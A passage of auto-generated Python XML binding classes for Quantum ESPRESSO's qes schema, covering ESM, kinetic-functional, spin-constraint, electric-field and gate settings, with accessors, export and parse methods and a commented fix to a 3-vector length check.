            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='esmType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='esmType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='esmType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None child element in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.bc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:bc>%s</qes:bc>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.bc), input_name='bc')), eol_))
        if self.nfit is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nfit>%s</qes:nfit>%s' % (self.gds_format_integer(self.nfit, input_name='nfit'), eol_))
        if self.w is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:w>%s</qes:w>%s' % (self.gds_format_double(self.w, input_name='w'), eol_))
        if self.efield is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:efield>%s</qes:efield>%s' % (self.gds_format_double(self.efield, input_name='efield'), eol_))
    def build(self, node):
        # Populate this instance from an ElementTree node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This type declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on the child tag name, converting text to the typed value
        # (string / positive integer / double).
        if nodeName_ == 'bc':
            bc_ = child_.text
            bc_ = self.gds_validate_string(bc_, node, 'bc')
            self.bc = bc_
        elif nodeName_ == 'nfit' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            # nfit is declared xsd:positiveInteger, so reject <= 0.
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nfit')
            self.nfit = ival_
        elif nodeName_ == 'w' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'w')
            self.w = fval_
        elif nodeName_ == 'efield' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'efield')
            self.efield = fval_
# end class esmType
class ekin_functionalType(GeneratedsSuper):
    """Generated binding for the qes ``ekin_functionalType`` complex type.

    Modified-kinetic-energy-functional parameters: ``ecfixed``, ``qcutz``
    and ``q2sigma`` (all doubles), with XML export/build support.
    Auto-generated (generateDS-style); regeneration overwrites manual edits.
    """
    subclass = None
    superclass = None
    def __init__(self, ecfixed=None, qcutz=None, q2sigma=None):
        self.original_tagname_ = None
        self.ecfixed = ecfixed
        self.qcutz = qcutz
        self.q2sigma = q2sigma
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered in CurrentSubclassModule_, then the
        # class-level `subclass` override, and finally this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ekin_functionalType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ekin_functionalType.subclass:
            return ekin_functionalType.subclass(*args_, **kwargs_)
        else:
            return ekin_functionalType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ecfixed(self): return self.ecfixed
    def set_ecfixed(self, ecfixed): self.ecfixed = ecfixed
    def get_qcutz(self): return self.qcutz
    def set_qcutz(self, qcutz): self.qcutz = qcutz
    def get_q2sigma(self): return self.q2sigma
    def set_q2sigma(self, q2sigma): self.q2sigma = q2sigma
    def hasContent_(self):
        # True when at least one child element would be exported.
        if (
            self.ecfixed is not None or
            self.qcutz is not None or
            self.q2sigma is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='ekin_functionalType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        # Write this element (and its children) to `outfile` at the given
        # indentation level, honoring any externally imported namespace defs.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ekin_functionalType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ekin_functionalType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ekin_functionalType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ekin_functionalType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ekin_functionalType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None child element in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.ecfixed is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ecfixed>%s</qes:ecfixed>%s' % (self.gds_format_double(self.ecfixed, input_name='ecfixed'), eol_))
        if self.qcutz is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:qcutz>%s</qes:qcutz>%s' % (self.gds_format_double(self.qcutz, input_name='qcutz'), eol_))
        if self.q2sigma is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:q2sigma>%s</qes:q2sigma>%s' % (self.gds_format_double(self.q2sigma, input_name='q2sigma'), eol_))
    def build(self, node):
        # Populate this instance from an ElementTree node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This type declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on the child tag name; all three children parse as doubles.
        if nodeName_ == 'ecfixed' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecfixed')
            self.ecfixed = fval_
        elif nodeName_ == 'qcutz' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'qcutz')
            self.qcutz = fval_
        elif nodeName_ == 'q2sigma' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'q2sigma')
            self.q2sigma = fval_
# end class ekin_functionalType
class spin_constraintsType(GeneratedsSuper):
    """Generated binding for the qes ``spin_constraintsType`` complex type.

    Carries spin-constraint settings: ``spin_constraints`` (string),
    ``lagrange_multiplier`` (double) and ``target_magnetization``
    (a d3vectorType, i.e. exactly three doubles), with XML export/build
    support. Auto-generated (generateDS-style); the only manual change is
    the d3vectorType length check, see ``validate_d3vectorType``.
    """
    subclass = None
    superclass = None
    def __init__(self, spin_constraints=None, lagrange_multiplier=None, target_magnetization=None):
        self.original_tagname_ = None
        self.spin_constraints = spin_constraints
        self.lagrange_multiplier = lagrange_multiplier
        self.target_magnetization = target_magnetization
        self.validate_d3vectorType(self.target_magnetization)
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered in CurrentSubclassModule_, then the
        # class-level `subclass` override, and finally this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, spin_constraintsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if spin_constraintsType.subclass:
            return spin_constraintsType.subclass(*args_, **kwargs_)
        else:
            return spin_constraintsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_spin_constraints(self): return self.spin_constraints
    def set_spin_constraints(self, spin_constraints): self.spin_constraints = spin_constraints
    def get_lagrange_multiplier(self): return self.lagrange_multiplier
    def set_lagrange_multiplier(self, lagrange_multiplier): self.lagrange_multiplier = lagrange_multiplier
    def get_target_magnetization(self): return self.target_magnetization
    def set_target_magnetization(self, target_magnetization): self.target_magnetization = target_magnetization
    def validate_d3vectorType(self, value):
        # Validate type d3vectorType, a restriction on double.
        # A d3vector must have exactly 3 components. The value may arrive
        # either as whitespace-separated element text (what
        # gds_validate_double_list passes through) or as an already-split
        # sequence, so count components. BUGFIX: the generated code compared
        # `len(str(value))` — the character count of the value's repr —
        # against 3, which warned spuriously for every well-formed 3-vector.
        if value is not None and Validate_simpletypes_:
            components_ = value.split() if isinstance(value, str) else value
            if len(components_) != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        # True when at least one child element would be exported.
        if (
            self.spin_constraints is not None or
            self.lagrange_multiplier is not None or
            self.target_magnetization is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='spin_constraintsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        # Write this element (and its children) to `outfile` at the given
        # indentation level, honoring any externally imported namespace defs.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('spin_constraintsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='spin_constraintsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='spin_constraintsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='spin_constraintsType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='spin_constraintsType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None child element in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.spin_constraints is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spin_constraints>%s</qes:spin_constraints>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.spin_constraints), input_name='spin_constraints')), eol_))
        if self.lagrange_multiplier is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:lagrange_multiplier>%s</qes:lagrange_multiplier>%s' % (self.gds_format_double(self.lagrange_multiplier, input_name='lagrange_multiplier'), eol_))
        if self.target_magnetization is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:target_magnetization>%s</qes:target_magnetization>%s' % (self.gds_format_double_list(self.target_magnetization, input_name='target_magnetization'), eol_))
    def build(self, node):
        # Populate this instance from an ElementTree node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This type declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on the child tag name, converting text to the typed value
        # (string / double / double list validated as a d3vector).
        if nodeName_ == 'spin_constraints':
            spin_constraints_ = child_.text
            spin_constraints_ = self.gds_validate_string(spin_constraints_, node, 'spin_constraints')
            self.spin_constraints = spin_constraints_
        elif nodeName_ == 'lagrange_multiplier' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'lagrange_multiplier')
            self.lagrange_multiplier = fval_
        elif nodeName_ == 'target_magnetization':
            target_magnetization_ = child_.text
            target_magnetization_ = self.gds_validate_double_list(target_magnetization_, node, 'target_magnetization')
            self.target_magnetization = target_magnetization_
            # validate type d3vectorType
            self.validate_d3vectorType(self.target_magnetization)
# end class spin_constraintsType
class electric_fieldType(GeneratedsSuper):
    """Generated binding for the qes ``electric_fieldType`` XML complex type.

    Holds the electric-field input settings (sawtooth potential,
    homogeneous field, Berry-phase options and gate settings) and supports
    round-tripping via ``build`` (parse) and ``export`` (serialize).
    """
    subclass = None
    superclass = None
    def __init__(self, electric_potential=None, dipole_correction=False, gate_settings=None, electric_field_direction=None, potential_max_position=None, potential_decrease_width=None, electric_field_amplitude=None, electric_field_vector=None, nk_per_string=None, n_berry_cycles=None):
        self.original_tagname_ = None
        self.electric_potential = electric_potential
        self.validate_electric_potentialType(self.electric_potential)
        self.dipole_correction = dipole_correction
        self.gate_settings = gate_settings
        self.electric_field_direction = electric_field_direction
        self.potential_max_position = potential_max_position
        self.potential_decrease_width = potential_decrease_width
        self.electric_field_amplitude = electric_field_amplitude
        self.electric_field_vector = electric_field_vector
        self.validate_d3vectorType(self.electric_field_vector)
        self.nk_per_string = nk_per_string
        self.n_berry_cycles = n_berry_cycles
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered via CurrentSubclassModule_, then the
        # class-level `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, electric_fieldType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if electric_fieldType.subclass:
            return electric_fieldType.subclass(*args_, **kwargs_)
        else:
            return electric_fieldType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor pairs (getter/setter per member).
    def get_electric_potential(self): return self.electric_potential
    def set_electric_potential(self, electric_potential): self.electric_potential = electric_potential
    def get_dipole_correction(self): return self.dipole_correction
    def set_dipole_correction(self, dipole_correction): self.dipole_correction = dipole_correction
    def get_gate_settings(self): return self.gate_settings
    def set_gate_settings(self, gate_settings): self.gate_settings = gate_settings
    def get_electric_field_direction(self): return self.electric_field_direction
    def set_electric_field_direction(self, electric_field_direction): self.electric_field_direction = electric_field_direction
    def get_potential_max_position(self): return self.potential_max_position
    def set_potential_max_position(self, potential_max_position): self.potential_max_position = potential_max_position
    def get_potential_decrease_width(self): return self.potential_decrease_width
    def set_potential_decrease_width(self, potential_decrease_width): self.potential_decrease_width = potential_decrease_width
    def get_electric_field_amplitude(self): return self.electric_field_amplitude
    def set_electric_field_amplitude(self, electric_field_amplitude): self.electric_field_amplitude = electric_field_amplitude
    def get_electric_field_vector(self): return self.electric_field_vector
    def set_electric_field_vector(self, electric_field_vector): self.electric_field_vector = electric_field_vector
    def get_nk_per_string(self): return self.nk_per_string
    def set_nk_per_string(self, nk_per_string): self.nk_per_string = nk_per_string
    def get_n_berry_cycles(self): return self.n_berry_cycles
    def set_n_berry_cycles(self, n_berry_cycles): self.n_berry_cycles = n_berry_cycles
    def validate_electric_potentialType(self, value):
        # Validate type electric_potentialType, a restriction on string.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['sawtooth_potential', 'homogenous_field', 'Berry_Phase', 'none']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on electric_potentialType' % {"value" : value.encode("utf-8")} )
    def validate_d3vectorType(self, value):
        """Validate type d3vectorType, a list of exactly 3 doubles.

        BUGFIX: the generated check used ``len(str(value)) != 3``, which
        measures the length of the *string representation* instead of the
        number of vector components, so every valid 3-component value
        triggered a spurious warning.  Count components instead, accepting
        either the raw whitespace-separated text or an already-built
        sequence.
        """
        if value is not None and Validate_simpletypes_:
            if isinstance(value, str):
                length_ = len(value.split())
            else:
                length_ = len(value)
            if length_ != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        """Return True when at least one child element would be exported."""
        if (
            self.electric_potential is not None or
            self.dipole_correction or
            self.gate_settings is not None or
            self.electric_field_direction is not None or
            self.potential_max_position is not None or
            self.potential_decrease_width is not None or
            self.electric_field_amplitude is not None or
            self.electric_field_vector is not None or
            self.nk_per_string is not None or
            self.n_berry_cycles is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='electric_fieldType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('electric_fieldType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Re-export under the tag name the element was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='electric_fieldType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='electric_fieldType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='electric_fieldType'):
        # No XML attributes declared for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='electric_fieldType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order; None members are skipped."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.electric_potential is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:electric_potential>%s</qes:electric_potential>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.electric_potential), input_name='electric_potential')), eol_))
        if self.dipole_correction:
            # Only exported when True (False is the schema default).
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:dipole_correction>%s</qes:dipole_correction>%s' % (self.gds_format_boolean(self.dipole_correction, input_name='dipole_correction'), eol_))
        if self.gate_settings is not None:
            self.gate_settings.export(outfile, level, namespaceprefix_, name_='gate_settings', pretty_print=pretty_print)
        if self.electric_field_direction is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:electric_field_direction>%s</qes:electric_field_direction>%s' % (self.gds_format_integer(self.electric_field_direction, input_name='electric_field_direction'), eol_))
        if self.potential_max_position is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:potential_max_position>%s</qes:potential_max_position>%s' % (self.gds_format_double(self.potential_max_position, input_name='potential_max_position'), eol_))
        if self.potential_decrease_width is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:potential_decrease_width>%s</qes:potential_decrease_width>%s' % (self.gds_format_double(self.potential_decrease_width, input_name='potential_decrease_width'), eol_))
        if self.electric_field_amplitude is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:electric_field_amplitude>%s</qes:electric_field_amplitude>%s' % (self.gds_format_double(self.electric_field_amplitude, input_name='electric_field_amplitude'), eol_))
        if self.electric_field_vector is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:electric_field_vector>%s</qes:electric_field_vector>%s' % (self.gds_format_double_list(self.electric_field_vector, input_name='electric_field_vector'), eol_))
        if self.nk_per_string is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nk_per_string>%s</qes:nk_per_string>%s' % (self.gds_format_integer(self.nk_per_string, input_name='nk_per_string'), eol_))
        if self.n_berry_cycles is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:n_berry_cycles>%s</qes:n_berry_cycles>%s' % (self.gds_format_integer(self.n_berry_cycles, input_name='n_berry_cycles'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes declared for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child element into the matching typed member."""
        if nodeName_ == 'electric_potential':
            electric_potential_ = child_.text
            electric_potential_ = self.gds_validate_string(electric_potential_, node, 'electric_potential')
            self.electric_potential = electric_potential_
            # validate type electric_potentialType
            self.validate_electric_potentialType(self.electric_potential)
        elif nodeName_ == 'dipole_correction':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'dipole_correction')
            self.dipole_correction = ival_
        elif nodeName_ == 'gate_settings':
            obj_ = gate_settingsType.factory()
            obj_.build(child_)
            self.gate_settings = obj_
            obj_.original_tagname_ = 'gate_settings'
        elif nodeName_ == 'electric_field_direction' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'electric_field_direction')
            self.electric_field_direction = ival_
        elif nodeName_ == 'potential_max_position' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'potential_max_position')
            self.potential_max_position = fval_
        elif nodeName_ == 'potential_decrease_width' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'potential_decrease_width')
            self.potential_decrease_width = fval_
        elif nodeName_ == 'electric_field_amplitude' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'electric_field_amplitude')
            self.electric_field_amplitude = fval_
        elif nodeName_ == 'electric_field_vector':
            electric_field_vector_ = child_.text
            electric_field_vector_ = self.gds_validate_double_list(electric_field_vector_, node, 'electric_field_vector')
            self.electric_field_vector = electric_field_vector_
            # validate type d3vectorType
            self.validate_d3vectorType(self.electric_field_vector)
        elif nodeName_ == 'nk_per_string' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'nk_per_string')
            self.nk_per_string = ival_
        elif nodeName_ == 'n_berry_cycles' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            ival_ = self.gds_validate_integer(ival_, node, 'n_berry_cycles')
            self.n_berry_cycles = ival_
# end class electric_fieldType
class gate_settingsType(GeneratedsSuper):
    """Generated binding for the qes ``gate_settingsType`` XML complex type.

    Charged-gate settings (gate position ``zgate``, relaxation flag, and
    the charge-blocking region ``block_1``/``block_2``/``block_height``)
    referenced by the electric_field input section.
    """
    subclass = None
    superclass = None
    def __init__(self, use_gate=None, zgate=None, relaxz=None, block=None, block_1=None, block_2=None, block_height=None):
        self.original_tagname_ = None
        self.use_gate = use_gate
        self.zgate = zgate
        self.relaxz = relaxz
        self.block = block
        self.block_1 = block_1
        self.block_2 = block_2
        self.block_height = block_height
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered via CurrentSubclassModule_, then the
        # class-level `subclass` hook, then this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, gate_settingsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if gate_settingsType.subclass:
            return gate_settingsType.subclass(*args_, **kwargs_)
        else:
            return gate_settingsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor pairs (getter/setter per member).
    def get_use_gate(self): return self.use_gate
    def set_use_gate(self, use_gate): self.use_gate = use_gate
    def get_zgate(self): return self.zgate
    def set_zgate(self, zgate): self.zgate = zgate
    def get_relaxz(self): return self.relaxz
    def set_relaxz(self, relaxz): self.relaxz = relaxz
    def get_block(self): return self.block
    def set_block(self, block): self.block = block
    def get_block_1(self): return self.block_1
    def set_block_1(self, block_1): self.block_1 = block_1
    def get_block_2(self): return self.block_2
    def set_block_2(self, block_2): self.block_2 = block_2
    def get_block_height(self): return self.block_height
    def set_block_height(self, block_height): self.block_height = block_height
    def hasContent_(self):
        """Return True when at least one child element would be exported."""
        if (
            self.use_gate is not None or
            self.zgate is not None or
            self.relaxz is not None or
            self.block is not None or
            self.block_1 is not None or
            self.block_2 is not None or
            self.block_height is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='gate_settingsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('gate_settingsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            # Re-export under the tag name the element was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='gate_settingsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='gate_settingsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='gate_settingsType'):
        # No XML attributes declared for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='gate_settingsType', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order; None members are skipped."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.use_gate is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:use_gate>%s</qes:use_gate>%s' % (self.gds_format_boolean(self.use_gate, input_name='use_gate'), eol_))
        if self.zgate is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:zgate>%s</qes:zgate>%s' % (self.gds_format_double(self.zgate, input_name='zgate'), eol_))
        if self.relaxz is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:relaxz>%s</qes:relaxz>%s' % (self.gds_format_boolean(self.relaxz, input_name='relaxz'), eol_))
        if self.block is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:block>%s</qes:block>%s' % (self.gds_format_boolean(self.block, input_name='block'), eol_))
        if self.block_1 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:block_1>%s</qes:block_1>%s' % (self.gds_format_double(self.block_1, input_name='block_1'), eol_))
        if self.block_2 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:block_2>%s</qes:block_2>%s' % (self.gds_format_double(self.block_2, input_name='block_2'), eol_))
        if self.block_height is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:block_height>%s</qes:block_height>%s' % (self.gds_format_double(self.block_height, input_name='block_height'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes declared for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one child element into the matching typed member."""
        if nodeName_ == 'use_gate':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'use_gate')
            self.use_gate = ival_
        elif nodeName_ == 'zgate' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
